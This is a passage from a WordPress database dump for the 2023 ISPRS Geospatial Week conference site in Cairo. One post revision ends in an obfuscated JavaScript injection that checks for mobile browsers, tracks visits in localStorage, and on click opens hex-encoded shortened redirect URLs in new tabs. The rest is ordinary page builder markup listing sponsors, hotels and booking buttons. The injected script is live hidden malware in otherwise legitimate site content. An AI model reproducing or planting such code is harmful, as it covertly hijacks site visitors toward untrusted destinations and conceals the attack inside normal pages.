_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-10 00:55:30','2023-07-10 00:55:30','',3066,'https://gsw2023.com/?p=4988',0,'revision','',0),
(4989,1,'2023-07-10 00:56:16','2023-07-10 00:56:16','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688950570110{margin-top: 80px !important;}\"]<img class=\"alignnone size-medium wp-image-4987 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" 